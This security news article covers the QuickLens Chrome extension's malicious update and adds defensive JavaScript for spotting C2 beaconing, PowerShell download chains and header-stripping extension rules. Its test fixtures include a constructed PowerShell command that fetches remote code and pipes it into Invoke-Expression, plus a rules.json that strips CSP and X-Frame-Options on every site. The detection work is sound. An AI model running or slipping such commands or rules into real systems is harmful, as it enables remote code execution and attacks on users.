eSecurity Planet content and product recommendations are
editorially independent. We may make money when you click on links
to our partners.
A once-trusted Chrome extension with thousands of users was quietly transformed into a malware delivery vehicle, exposing how quickly browser add-ons can become security liabilities.
QuickLens – Search Screen with Google Lens was removed from the Chrome Web Store after researchers discovered it had been updated to deploy ClickFix attacks and steal cryptocurrency wallet data.
“For every page, frame, and request, the security headers are now gone. User traffic is now vulnerable to many new attacks like clickjacking,” said Annex researchers.
Inside the Malicious Chrome Extension Update
Browser extensions operate with extensive access to web traffic, page content, and authenticated user sessions.
In the case of QuickLens, the extension had approximately 7,000 users and previously held a featured badge in the Chrome Web Store, lending it credibility.
After a reported ownership change in early February 2026, a malicious update was pushed to users on Feb. 17, 2026.
That update introduced expanded permissions and embedded command-and-control (C2) functionality, effectively transforming a legitimate tool into a malware delivery mechanism.
From Trusted Chrome Extension to Malware Loader
The compromised version requested new permissions, including declarativeNetRequestWithHostAccess and webRequest, which granted deeper control over browsing activity and network requests.
It also included a rules.json configuration that stripped key browser security headers — such as Content-Security-Policy (CSP), X-Frame-Options, and X-XSS-Protection — from all visited pages.
CSP restricts which scripts a page is allowed to run, and X-Frame-Options stops the page from being framed by another origin (the clickjacking case); X-XSS-Protection is a legacy header that current Chrome no longer acts on, so its removal matters mainly in other browsers. By removing these headers from every response, the extension switched off the defenses that sites ship to protect themselves and allowed injected scripts to run across otherwise protected websites.
Command-and-Control and Payload Execution
Once active, the extension began communicating with a C2 server at api.extensionanalyticspro[.]top.
It generated a persistent UUID to track victims, fingerprinted users’ countries using Cloudflare’s trace endpoint, identified browser and operating system details, and polled the C2 infrastructure every five minutes for instructions.
Malicious JavaScript payloads were delivered in response and executed on every page load using what researchers described as a “1×1 GIF pixel onload trick.”
Because CSP protections had been stripped, these inline scripts executed successfully — even on sites that would typically block such behavior.
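The five-minute polling described above has a network signature that is easy to hunt for in web-proxy logs: a low-jitter, regularly spaced series of requests from one client to one host. The following detector is an added example, not code from the article or from the extension; the log format, client addresses, paths and timestamps are constructed for illustration (the C2 hostname is the one the article names, written there in defanged form).

```javascript
// Added example: flag fixed-interval C2 polling in constructed proxy logs.
// Format of each line: "<ISO timestamp> <client> <host> <path>".
const SAMPLE_LOG = `
2026-02-18T09:00:00Z 10.0.0.5 api.extensionanalyticspro.top /poll
2026-02-18T09:00:01Z 10.0.0.5 www.example.com /
2026-02-18T09:05:00Z 10.0.0.5 api.extensionanalyticspro.top /poll
2026-02-18T09:07:12Z 10.0.0.5 www.example.com /news
2026-02-18T09:10:01Z 10.0.0.5 api.extensionanalyticspro.top /poll
2026-02-18T09:12:30Z 10.0.0.5 www.example.com /search
2026-02-18T09:15:00Z 10.0.0.5 api.extensionanalyticspro.top /poll
2026-02-18T09:18:05Z 10.0.0.5 www.example.com /cart
2026-02-18T09:19:40Z 10.0.0.5 www.example.com /contact
2026-02-18T09:20:00Z 10.0.0.5 api.extensionanalyticspro.top /poll
2026-02-18T09:03:00Z 10.0.0.7 www.example.com /
2026-02-18T09:30:00Z 10.0.0.7 www.example.com /about
`;

function parseProxyLog(text) {
  return text.trim().split("\n").map((line) => {
    const [ts, client, host, path] = line.trim().split(/\s+/);
    return { ts: Date.parse(ts) / 1000, client, host, path };
  });
}

// Group requests by (client, host), compute the gaps between consecutive
// requests, and report pairs whose gaps cluster tightly around one interval.
// minHits keeps one-off visits out; maxJitterRatio is the coefficient of
// variation (stddev / mean) of the gaps that still counts as "regular".
function findBeacons(records, { minHits = 4, maxJitterRatio = 0.05 } = {}) {
  const byPair = new Map();
  for (const r of records) {
    const key = `${r.client}\t${r.host}`;
    if (!byPair.has(key)) byPair.set(key, []);
    byPair.get(key).push(r.ts);
  }
  const hits = [];
  for (const [key, times] of byPair) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    const variance = gaps.reduce((a, g) => a + (g - mean) ** 2, 0) / gaps.length;
    const jitter = Math.sqrt(variance) / mean;
    if (jitter <= maxJitterRatio) {
      const [client, host] = key.split("\t");
      hits.push({ client, host, count: times.length, intervalSec: Math.round(mean), jitter });
    }
  }
  return hits;
}

const beacons = findBeacons(parseProxyLog(SAMPLE_LOG));
console.log(beacons); // one hit: 10.0.0.5 -> api.extensionanalyticspro.top, 300 s
```

The ordinary browsing to www.example.com from the same client has five requests but irregular gaps, so it is not reported. In production the thresholds need tuning (laptops sleep, which stretches one gap), and the hit list is most useful when cross-referenced with how many clients in the estate talk to that host at all.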
ClickFix Malware and Cryptocurrency Theft
One of the delivered payloads displayed a fake Google Update prompt designed to initiate a ClickFix attack.
Windows users who clicked the update were prompted to download a file named googleupdate.exe, signed with a certificate belonging to Hubei Da’e Zhidao Food Technology Co., Ltd.
When executed, the file launched a hidden PowerShell command that spawned a second PowerShell instance.
This secondary process retrieved additional instructions from a remote server using a custom user agent and piped the response into Invoke-Expression, enabling remote code execution directly on the victim’s machine.
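The process chain above (downloaded binary, hidden PowerShell, second PowerShell that downloads and pipes into Invoke-Expression) is a good fit for process-creation telemetry such as EDR or Sysmon Event ID 1 data. The hunt below is an added example, not code from the article; the event shape, PIDs, file paths, command lines and the sample User-Agent value are constructed, and the use of -WindowStyle Hidden and Invoke-WebRequest is an assumption about how the behavior the article describes would appear, not a detail the article states. The expected signer string for a genuine Google binary is likewise an assumption.

```javascript
// Added example: hunt a PowerShell -> PowerShell chain with download-and-IEX
// over constructed process-creation events.
const EVENTS = [
  { pid: 100, ppid: 1, image: "C:\\Windows\\explorer.exe", signer: "Microsoft Windows",
    cmdline: "explorer.exe" },
  // stage 1: the downloaded binary; signer name taken from the article
  { pid: 4210, ppid: 100, image: "C:\\Users\\alice\\Downloads\\googleupdate.exe",
    signer: "Hubei Da'e Zhidao Food Technology Co., Ltd.", cmdline: "googleupdate.exe" },
  // stage 2: hidden PowerShell spawned by the binary (script path assumed)
  { pid: 4302, ppid: 4210, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    signer: "Microsoft Windows",
    cmdline: "powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\alice\\AppData\\Local\\Temp\\stage1.ps1" },
  // stage 3: second PowerShell fetching instructions with a custom UA and piping them to IEX
  { pid: 4377, ppid: 4302, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    signer: "Microsoft Windows",
    cmdline: "powershell.exe -NoProfile -Command \"Invoke-WebRequest -UseBasicParsing -UserAgent 'Updater/1.0' -Uri 'https://example.invalid/stage2' | Select-Object -ExpandProperty Content | Invoke-Expression\"" },
  // benign: an admin's console PowerShell running a script in a child shell
  { pid: 5001, ppid: 100, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    signer: "Microsoft Windows", cmdline: "powershell.exe" },
  { pid: 5002, ppid: 5001, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    signer: "Microsoft Windows", cmdline: "powershell.exe -File C:\\scripts\\backup.ps1" },
];

// Parents that normally launch an interactive PowerShell; anything else at the
// root of a PowerShell -> PowerShell chain is worth a look.
const INTERACTIVE_HOSTS = new Set(["explorer.exe", "cmd.exe", "wt.exe", "code.exe", "windowsterminal.exe"]);
const EXPECTED_GOOGLE_SIGNER = "Google LLC"; // assumed signer of a genuine Google Update binary
const HIDDEN = /-w(indowstyle)?\s+hidden/i;
const DOWNLOADER = /\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|Net\.WebClient)\b/i;
const EVALUATOR = /\b(Invoke-Expression|iex)\b/i;

const basename = (p) => p.split(/[\\/]/).pop().toLowerCase();
const isPowerShell = (e) => /^(powershell|pwsh)\.exe$/.test(basename(e.image));

// Returns one record per PowerShell -> PowerShell chain that accumulates at
// least minReasons independent signals, so a lone hidden window or a lone
// download does not page anyone.
function findSuspiciousChains(events, minReasons = 2) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const chains = [];
  for (const child of events) {
    if (!isPowerShell(child)) continue;
    const parent = byPid.get(child.ppid);
    if (!parent || !isPowerShell(parent)) continue;
    const root = byPid.get(parent.ppid);
    if (!root) continue;
    const reasons = [];
    if (!INTERACTIVE_HOSTS.has(basename(root.image)))
      reasons.push(`PowerShell chain rooted at ${basename(root.image)}`);
    if (HIDDEN.test(parent.cmdline) || HIDDEN.test(child.cmdline))
      reasons.push("hidden window");
    if (DOWNLOADER.test(child.cmdline) && EVALUATOR.test(child.cmdline))
      reasons.push("web download piped to Invoke-Expression");
    if (/-UserAgent\b/i.test(child.cmdline))
      reasons.push("custom User-Agent on download");
    if (basename(root.image) === "googleupdate.exe" && root.signer !== EXPECTED_GOOGLE_SIGNER)
      reasons.push(`googleupdate.exe signed by "${root.signer}", not ${EXPECTED_GOOGLE_SIGNER}`);
    if (reasons.length >= minReasons)
      chains.push({ root: root.pid, parent: parent.pid, child: child.pid, reasons });
  }
  return chains;
}

const chains = findSuspiciousChains(EVENTS);
console.log(JSON.stringify(chains, null, 2)); // one chain, rooted at pid 4210, five reasons
```

Scoring several weak signals together is what keeps this usable: the admin's console shell spawning a child shell matches the PowerShell-to-PowerShell shape but collects no reasons, while the stage-3 process collects all five.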
In parallel, other malicious scripts targeted cryptocurrency wallets, including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Brave Wallet, and others.
When a wallet was detected, the injected scripts attempted to extract wallet activity data and seed phrases, information that lets an attacker take control of the wallet and move its funds.
Additional payloads scraped Gmail inbox contents, Facebook Business Manager advertising accounts, YouTube channel data, and harvested login credentials and payment information entered into web forms.
Some reports also indicated possible targeting of macOS users with the AMOS infostealer, although independent confirmation of that activity was limited.
Following disclosure of the malicious behavior, Google removed QuickLens from the Chrome Web Store and automatically disabled it in affected browsers.
How to Mitigate Browser Extension Risk
Browser extensions have become an indispensable part of modern workflows — but they also represent a rapidly expanding attack surface inside the enterprise.
As recent campaigns have shown, malicious or compromised extensions can bypass traditional perimeter defenses and operate directly within trusted browser sessions.
Because these threats often rely on legitimate functionality rather than CVEs, organizations must take a layered, policy-driven approach to reduce risk.
- Centrally manage and restrict browser extension installations using Chrome enterprise policies, allowing only approved extensions and blocking excessive or newly requested permissions.
- Regularly audit installed extensions, monitor for ownership changes or permission expansions, and remove unnecessary or outdated add-ons.
- Monitor for suspicious browser behavior, including unexpected outbound connections, repetitive beaconing, header manipulation, and use of high-risk permissions such as webRequest or declarativeNetRequestWithHostAccess.
- Enforce least privilege and phishing-resistant multi-factor authentication to reduce the impact of credential theft and post-compromise lateral movement.
- Deploy endpoint protection, browser isolation, and data loss prevention controls to detect and prevent credential harvesting, wallet exfiltration, and malicious script execution.
- Require affected users to fully remove compromised extensions, reset stored credentials, and transfer cryptocurrency assets to newly generated wallets with fresh seed phrases.
- Continuously validate security controls and test incident response plans through tabletop exercises or breach and attack simulations for browser-based supply chain attacks.
Together, these controls help limit the blast radius of a compromised extension while strengthening organizational resilience against evolving browser-based supply chain threats.
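Two of the signals named above, the header-stripping rules.json and the newly requested high-risk permissions, can be checked mechanically before an extension version is approved. The audit below is an added example, not code from the article, from Google or from the extension; the manifest and rule set are constructed to mirror what the article describes (field names follow the Chrome Manifest V3 declarativeNetRequest schema), and the permission and header lists are this example's own choices.

```javascript
// Added example: audit a Manifest V3 manifest and its declarativeNetRequest
// rule file for high-risk permissions and security-header removal.
const HIGH_RISK_PERMISSIONS = new Set([
  "webRequest", "webRequestBlocking", "declarativeNetRequest",
  "declarativeNetRequestWithHostAccess", "scripting", "cookies", "debugger",
]);
const SECURITY_HEADERS = new Set([
  "content-security-policy", "content-security-policy-report-only",
  "x-frame-options", "x-xss-protection", "x-content-type-options",
  "strict-transport-security",
]);

// Constructed manifest.json mirroring the permissions the article lists.
const MANIFEST = {
  manifest_version: 3,
  name: "Example Lens",
  version: "2.0.0",
  permissions: ["declarativeNetRequest", "declarativeNetRequestWithHostAccess", "webRequest", "storage"],
  host_permissions: ["<all_urls>"],
  declarative_net_request: { rule_resources: [{ id: "ruleset_1", enabled: true, path: "rules.json" }] },
};

// Constructed rules.json: rule 1 is the header-stripping shape the article
// describes; rule 2 is an ordinary ad-blocking rule for contrast.
const RULES = [
  {
    id: 1, priority: 1,
    action: { type: "modifyHeaders", responseHeaders: [
      { header: "Content-Security-Policy", operation: "remove" },
      { header: "X-Frame-Options", operation: "remove" },
      { header: "X-XSS-Protection", operation: "remove" } ] },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame", "xmlhttprequest", "script"] },
  },
  { id: 2, priority: 1, action: { type: "block" },
    condition: { urlFilter: "||ads.example.net^", resourceTypes: ["script"] } },
];

function auditExtension(manifest, rules) {
  const findings = [];
  for (const p of manifest.permissions || []) {
    if (HIGH_RISK_PERMISSIONS.has(p)) findings.push({ severity: "medium", what: `high-risk permission ${p}` });
  }
  if ((manifest.host_permissions || []).includes("<all_urls>")) {
    findings.push({ severity: "medium", what: "host access to every site" });
  }
  for (const r of rules) {
    if (r.action?.type !== "modifyHeaders") continue;
    const removed = (r.action.responseHeaders || [])
      .filter((h) => h.operation === "remove" && SECURITY_HEADERS.has(h.header.toLowerCase()))
      .map((h) => h.header);
    if (removed.length === 0) continue;
    // A rule scoped to nothing in particular applies to every site the
    // extension has host access to; that is the dangerous combination.
    const c = r.condition || {};
    const broad = (!c.urlFilter || c.urlFilter === "*") && !c.initiatorDomains && !c.requestDomains;
    findings.push({ severity: broad ? "high" : "medium",
      what: `rule ${r.id} removes ${removed.join(", ")}${broad ? " on all sites" : ""}` });
  }
  return findings;
}

// Show the effect of the "remove" operations on one response, assuming the
// rule's condition matches the request (it does for urlFilter "*").
function headersAfterRules(headers, rules) {
  const out = { ...headers };
  for (const r of rules) {
    if (r.action?.type !== "modifyHeaders") continue;
    for (const h of r.action.responseHeaders || []) {
      if (h.operation !== "remove") continue;
      for (const k of Object.keys(out)) if (k.toLowerCase() === h.header.toLowerCase()) delete out[k];
    }
  }
  return out;
}

const findings = auditExtension(MANIFEST, RULES);
console.log(findings); // 5 findings, one of them high
const stripped = headersAfterRules(
  { "Content-Security-Policy": "script-src 'self'", "X-Frame-Options": "DENY", "Content-Type": "text/html" },
  RULES,
);
console.log(stripped); // only Content-Type survives
```

Running such a check against each new version in a managed catalog, and diffing the result against the previously approved version, catches exactly the kind of post-ownership-change update that hit QuickLens: the permissions grew and a rule set appeared that no screen-search tool has any reason to ship.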
Browser Extensions as an Attack Surface
The QuickLens incident highlights how quickly a legitimate browser extension can become a security risk.
As threat actors continue to misuse update mechanisms and expanded permissions, organizations should treat browser extensions as a managed component of their overall attack surface rather than an afterthought.
Incidents like this are prompting organizations to reevaluate implicit trust within their environments and adopt zero trust solutions that continuously verify users, devices, and activity.
